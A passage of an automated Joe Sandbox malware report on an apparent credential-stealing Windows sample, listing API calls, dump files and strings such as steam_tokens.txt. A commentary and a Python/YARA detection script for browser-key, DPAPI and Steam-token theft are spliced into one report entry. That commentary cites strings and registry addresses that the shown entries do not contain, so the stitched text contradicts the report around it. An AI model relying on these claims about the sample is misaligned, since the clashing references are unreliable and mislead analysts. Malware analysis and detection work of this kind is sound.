                              • Opcode ID: e0325cc62e5a330382c925070ceb9316ecc1d6c85538775d4f182de095d785c4
                              • Instruction ID: 05fcfa9ca8cc5a95baeae48fbf90521011f165c2f10835f2556803670696f0c4
                              • Opcode Fuzzy Hash: e0325cc62e5a330382c925070ceb9316ecc1d6c85538775d4f182de095d785c4
                              • Instruction Fuzzy Hash: 40419D71A012499BDB21EF65DC897EEBBB4AF54304F048464EF25AB253EA38ED05C790
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007CEA24
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CEA53
                              • lstrcat.KERNEL32(?,00000000), ref: 007CEA61
                              • lstrcat.KERNEL32(?,007E1794), ref: 007CEA7A
                              • lstrcat.KERNEL32(?,01458B98), ref: 007CEA8D
                              • lstrcat.KERNEL32(?,007E1794), ref: 007CEA9F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: db3b65701d538458a775cdb9d00b2063ba9f8895ec38a440d0a25236ccad8512
                              • Instruction ID: 7b18f33b5866e63effe6d6d4709a681154b2e028e481dafb7abae4113a9910da
                              • Opcode Fuzzy Hash: db3b65701d538458a775cdb9d00b2063ba9f8895ec38a440d0a25236ccad8512
                              • Instruction Fuzzy Hash: 28419A71911158EFCB55EF64DC86FED7378FF88300F404468BA1AAB281DE749E859B50
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CECDF
                              • lstrlen.KERNEL32(00000000), ref: 007CECF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CED1D
                              • lstrlen.KERNEL32(00000000), ref: 007CED24
                              • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 007CED52
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: steam_tokens.txt
                              • API String ID: 367037083-401951677
                              • Opcode ID: 3467b607b5ebd2ce3eaf03a2799642894b0c6e05bf876efc811fc19487389a40
                              • Instruction ID: 87f8cf122272c50bfdf00affc6b4f3d0207bf68293417c147f00548cb95cbec5
                              • Opcode Fuzzy Hash: 3467b607b5ebd2ce3eaf03a2799642894b0c6e05bf876efc811fc19487389a40
                              • Instruction Fuzzy Hash: E8314B31A165559BC722BF78E84EB9E77A9AF40700F059168BC46EB213DA2CDC0687D1
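Taken together, the string constants the sandbox resolved in the entries above ("encrypted_key":" for Chromium's Local State, DPAPI, and steam_tokens.txt) are worth a hunting rule, but only as a co-occurrence: DPAPI on its own appears in plenty of legitimate binaries. The scanner below is an added example in Python, not part of this report or of Joe Sandbox; it weights the indicators, flags a buffer only when a strong marker is joined by another hit, and renders the same logic as a YARA rule. One caveat the report itself supports: several string arguments listed here (for example 0145D360 and 0145DD20 passed to RegOpenKeyExA and RegQueryValueExA, or 0145D360-range pointers in other entries) lie well outside the image mapping that starts at 007B0000, so those strings were built or decoded at runtime and a static scan of file.exe may miss them; run the scanner over the process memory dumps listed under Memory Dump Source. The dump fragments scanned here are constructed for the demonstration, and the weights are an assumption to tune against your own corpus.

```python
import re

# Indicator table: (name, byte pattern, weight). Weights are an assumption
# for this example. Patterns are ASCII only because the sample uses the
# A-suffixed string APIs (lstrcpy, lstrcat, StrStrA), so it never builds
# UTF-16 copies of these strings.
INDICATORS = (
    ("chromium_local_state_marker", b'"encrypted_key":"', 3),
    ("steam_tokens_file",           b"steam_tokens.txt", 3),
    ("dpapi_tag",                   b"DPAPI",            1),   # noisy on its own
)
ALERT_THRESHOLD = 4   # one strong indicator plus at least one more hit


def scan(buf: bytes) -> dict:
    """Return {indicator_name: [offsets]} for every indicator present in buf."""
    hits = {}
    for name, pattern, _ in INDICATORS:
        offsets = [m.start() for m in re.finditer(re.escape(pattern), buf)]
        if offsets:
            hits[name] = offsets
    return hits


def score(hits: dict) -> int:
    """Sum the weight of each distinct indicator that matched (count once)."""
    weights = {name: w for name, _, w in INDICATORS}
    return sum(weights[name] for name in hits)


def is_suspicious(buf: bytes) -> bool:
    return score(scan(buf)) >= ALERT_THRESHOLD


def to_yara(rule_name: str = "stealer_chromium_steam_strings") -> str:
    """Render INDICATORS as a YARA rule with the same co-occurrence condition:
    one of the two strong strings ($s0, $s1) together with any second string."""
    lines = [f"rule {rule_name}", "{", "    strings:"]
    for i, (name, pattern, _) in enumerate(INDICATORS):
        esc = pattern.decode("ascii").replace("\\", "\\\\").replace('"', '\\"')
        lines.append(f'        $s{i} = "{esc}" ascii  // {name}')
    lines += ["    condition:", "        ($s0 or $s1) and 2 of them", "}"]
    return "\n".join(lines)


# Constructed dump fragments for the demonstration (not bytes from the sample).
SAMPLE_DUMP = (
    b"\x00" * 32
    + b'"encrypted_key":"\x00'
    + b"\x90" * 16
    + b"DPAPI\x00"
    + b"\x00" * 8
    + b"steam_tokens.txt\x00"
)
# Only the noisy tag plus a CRT message: must not alert.
BENIGN_DUMP = b"\x00" * 8 + b"DPAPI\x00" + b"\x00" * 8 + b"vector<T> too long\x00"


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:                # e.g. the .sdmp dumps from the report
        with open(path, "rb") as fh:
            data = fh.read()
        hits = scan(data)
        print(path, "score", score(hits), "SUSPICIOUS" if is_suspicious(data) else "clean", hits)
    if len(sys.argv) == 1:
        print(to_yara())
```

Invoke it with one or more dump files to get per-file hits and offsets, or with no arguments to print the YARA rule. Matching on distinct indicators rather than raw hit counts keeps a file that repeats DPAPI a hundred times from scoring higher than one that contains the Local State marker once.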
                              APIs
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,007B140E), ref: 007B9A9A
                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,007B140E), ref: 007B9AB0
                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,007B140E), ref: 007B9AC7
                              • ReadFile.KERNEL32(00000000,00000000,?,007B140E,00000000,?,?,?,007B140E), ref: 007B9AE0
                              • LocalFree.KERNEL32(?,?,?,?,007B140E), ref: 007B9B00
                              • CloseHandle.KERNEL32(00000000,?,?,?,007B140E), ref: 007B9B07
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 3639be3c0f1a171802a01265c2140b0da4da27828e27becb249e1cbea5f71150
                              • Instruction ID: 5590c431b231bdb95a89281d2d38dd6920cf6a8c277994edc83085613a3e7bf4
                              • Opcode Fuzzy Hash: 3639be3c0f1a171802a01265c2140b0da4da27828e27becb249e1cbea5f71150
                              • Instruction Fuzzy Hash: 74111CB1614209AFEB10DFA9DCC8FAB776CEB04740F104569FA15EA280EB749D40CBA0
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 007D5B14
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA188
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA1AE
                              • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 007D5B7C
                              • memmove.MSVCRT(00000000,?,?), ref: 007D5B89
                              • memmove.MSVCRT(00000000,?,?), ref: 007D5B98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long
                              • API String ID: 2052693487-3788999226
                              • Opcode ID: 61566c43595a4a0d3ead0dba4207a8a6ef39038602f98534853f3b7b3863c68c
                              • Instruction ID: 7d3993bbb1922702c1d05f2a7bd0ebf6d83e495ba488c4f20506841e52b447ec
                              • Opcode Fuzzy Hash: 61566c43595a4a0d3ead0dba4207a8a6ef39038602f98534853f3b7b3863c68c
                              • Instruction Fuzzy Hash: 194164B1B005199FCF18DF6CC995AAEB7F5EB88310F15822AE919E7345E634DD01CBA0
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Typememset
                              • String ID:
                              • API String ID: 3530896902-3916222277
                              • Opcode ID: 8aa6cdb7d85401d4ca0fcdbf4730251240696e4a6cefc30f468956d2d36b4dd9
                              • Instruction ID: 70faf4678b98f5f11b38ad5973b31efc0b6e3579d2ac6220d0b7e82dd216b28f
                              • Opcode Fuzzy Hash: 8aa6cdb7d85401d4ca0fcdbf4730251240696e4a6cefc30f468956d2d36b4dd9
                              • Instruction Fuzzy Hash: E841EB7150475CAEDB358B248C89FFB7BFCAB45704F1444E9EA8687282E275AA45CF20
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 007C7D58
                                • Part of subcall function 007DA1C0: std::exception::exception.LIBCMT ref: 007DA1D5
                                • Part of subcall function 007DA1C0: std::exception::exception.LIBCMT ref: 007DA1FB
                              • std::_Xinvalid_argument.LIBCPMT ref: 007C7D76
                              • std::_Xinvalid_argument.LIBCPMT ref: 007C7D91
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_$std::exception::exception
                              • String ID: invalid string position$string too long
                              • API String ID: 3310641104-4289949731
                              • Opcode ID: d56d3579069d75bda7a96d596393b60c3e67ebcf20f614183f89641f391e12a3
                              • Instruction ID: 7a63b2dd4e42b65fd055d4be701e66f8ade1bc4414e58975702b46a47afbb0a3
                              • Opcode Fuzzy Hash: d56d3579069d75bda7a96d596393b60c3e67ebcf20f614183f89641f391e12a3
                              • Instruction Fuzzy Hash: 3721A5723046049BD728DE6CD881F3AB7E5BF95750F204A6EE4528B342EB79DC40CBA5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007D33EF
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D33F6
                              • GlobalMemoryStatusEx.KERNEL32 ref: 007D3411
                              • wsprintfA.USER32 ref: 007D3437
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB
                              • API String ID: 2922868504-2651807785
                              • Opcode ID: 91829f6f07ca972f2c5a710bab8385139a4559526981cfdcc92612bc814fa008
                              • Instruction ID: 2ba79bd94360fef93d23a658ec1f5a071fe437a69dd4878f8688f951e5410867
                              • Opcode Fuzzy Hash: 91829f6f07ca972f2c5a710bab8385139a4559526981cfdcc92612bc814fa008
                              • Instruction Fuzzy Hash: 320128B1A14248AFDB14DF98CC49BBEB7B8FB45710F00012AF906E7380D7785D0086A1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Similarity
                              • API ID: __amsg_exit$__getptdfree
                              • String ID: Xu~$Xu~
                              • API String ID: 2640026729-944843931
                              • Opcode ID: bff66685397ab876663e64bdb7aa6dfc4c864cc23d77c18cd60dc327a711cf6e
                              • Instruction ID: 1a30d412bf7e49ae3c77d180309d4402d5f635500688073e82cbcb4c1df882bf
                              • Opcode Fuzzy Hash: bff66685397ab876663e64bdb7aa6dfc4c864cc23d77c18cd60dc327a711cf6e
                              • Instruction Fuzzy Hash: 5E01C032A06B51EBDB18AB69948A79DB370BF04B20F584017E9046B781EB2C7D40DBD9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Similarity
                              • API ID: lstrcpylstrlenmemset
                              • String ID:
                              • API String ID: 3212139465-0
                              • Opcode ID: 6a484ef14bb2bd7790fe1bfc6c178d4698c15f15a459ec213a1e2e006b22a620
                              • Instruction ID: 8a2d23c43be455bfaa2dc35afaa3f961cc926c0435daed52f03747e93a02e437
                              • Opcode Fuzzy Hash: 6a484ef14bb2bd7790fe1bfc6c178d4698c15f15a459ec213a1e2e006b22a620
                              • Instruction Fuzzy Hash: 1881E871E043059BDB14DF94DC84BAEB7B5EF94300F1480AAE909A7382EB399D47CB94
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 007C7F31
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C7F60
                              • StrCmpCA.SHLWAPI(00000000,007E4C3C), ref: 007C7FA5
                              • StrCmpCA.SHLWAPI(00000000,007E4C3C), ref: 007C7FD3
                              • StrCmpCA.SHLWAPI(00000000,007E4C3C), ref: 007C8007
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: fa8fde24852b9d6a19b4a860561ff2300aadc85b3ac3f5fedd16531a8e9b1c98
                              • Instruction ID: 3ab93a2456689faed82fb5156e2643e7bccdfbf54a324c52e5f019ad4ea561c8
                              • Opcode Fuzzy Hash: fa8fde24852b9d6a19b4a860561ff2300aadc85b3ac3f5fedd16531a8e9b1c98
                              • Instruction Fuzzy Hash: 56418B7050811ADFCB20DF69D8C4EAEB7B4FF54300B11819DE805AB251DB78AA66CF91
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 007C80BB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C80EA
                              • StrCmpCA.SHLWAPI(00000000,007E4C3C), ref: 007C8102
                              • lstrlen.KERNEL32(00000000), ref: 007C8140
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C816F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: c377cd7aaa247e5024bea54cba622852845caf880b4f34b2886457754d7dfbd8
                              • Instruction ID: d866b261949024678e5add6bbcb745397e614299399fc5d26cdcacbffe547ba8
                              • Opcode Fuzzy Hash: c377cd7aaa247e5024bea54cba622852845caf880b4f34b2886457754d7dfbd8
                              • Instruction Fuzzy Hash: D1418C7160010AEBCB61DF68D988FAABBF4EF44300F15855CA849D7245EF38DD46CB91
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 007D1B72
                                • Part of subcall function 007D1820: lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D184F
                                • Part of subcall function 007D1820: lstrlen.KERNEL32(01445B90), ref: 007D1860
                                • Part of subcall function 007D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 007D1887
                                • Part of subcall function 007D1820: lstrcat.KERNEL32(00000000,00000000), ref: 007D1892
                                • Part of subcall function 007D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 007D18C1
                                • Part of subcall function 007D1820: lstrlen.KERNEL32(007E4FA0), ref: 007D18D3
                                • Part of subcall function 007D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 007D18F4
                                • Part of subcall function 007D1820: lstrcat.KERNEL32(00000000,007E4FA0), ref: 007D1900
                                • Part of subcall function 007D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 007D192F
                              • sscanf.NTDLL ref: 007D1B9A
                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 007D1BB6
                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 007D1BC6
                              • ExitProcess.KERNEL32 ref: 007D1BE3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Similarity
                              • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                              • String ID:
                              • API String ID: 3040284667-0
                              • Opcode ID: 42cfc4194dfd1358e0eecd7865da8b42775620b03954c24d63d4be199121327b
                              • Instruction ID: 41f144edb6331c9f1680f634d6b1f78dc072188315216351090ca87a36483363
                              • Opcode Fuzzy Hash: 42cfc4194dfd1358e0eecd7865da8b42775620b03954c24d63d4be199121327b
                              • Instruction Fuzzy Hash: 7D21F5B1518341AF8350DF65D88496FBBF9FFC8215F808A1EF599C7220E734D9058BA2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007D3166
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D316D
                              • RegOpenKeyExA.ADVAPI32(80000002,0144B818,00000000,00020119,?), ref: 007D318C
                              • RegQueryValueExA.ADVAPI32(?,0145D2E0,00000000,00000000,00000000,000000FF), ref: 007D31A7
                              • RegCloseKey.ADVAPI32(?), ref: 007D31B1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 37fce6b82cd49e9c1b3f65411d99902629e5ccf3c160fba496e95bca3d9fd2a8
                              • Instruction ID: 380d6b417db6f8b94668f8abbc922ee58ba964758364d6ca440dd6b375e6eb49
                              • Opcode Fuzzy Hash: 37fce6b82cd49e9c1b3f65411d99902629e5ccf3c160fba496e95bca3d9fd2a8
                              • Instruction Fuzzy Hash: F7116076A04245AFD710CB94EC85FABB7BCF748711F10422AFA0997780DB755D0087A1
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 007B8996
                                • Part of subcall function 007DA1C0: std::exception::exception.LIBCMT ref: 007DA1D5
                                • Part of subcall function 007DA1C0: std::exception::exception.LIBCMT ref: 007DA1FB
                              • std::_Xinvalid_argument.LIBCPMT ref: 007B89CD
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA188
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA1AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: invalid string position$string too long
                              • API String ID: 2002836212-4289949731
                              • Opcode ID: 7da4a49af50f6b2b1e8dbf1901eb2b316f1f06a59c87ae3e03a34a1fddd37c58
                              • Instruction ID: 4192271f2f757ce50676f48366e6f730dabe0a79bd701394d3758864e839e92c
                              • Opcode Fuzzy Hash: 7da4a49af50f6b2b1e8dbf1901eb2b316f1f06a59c87ae3e03a34a1fddd37c58
                              • Instruction Fuzzy Hash: 3D21E7723002509BCB60DA6CE840BAAF7ADDBA1761B15093FF151CB281DA79EC41C3A7
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 007B8883
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA188
                                • Part of subcall function 007DA173: std::exception::exception.LIBCMT ref: 007DA1AE
                              Memory Dump Source
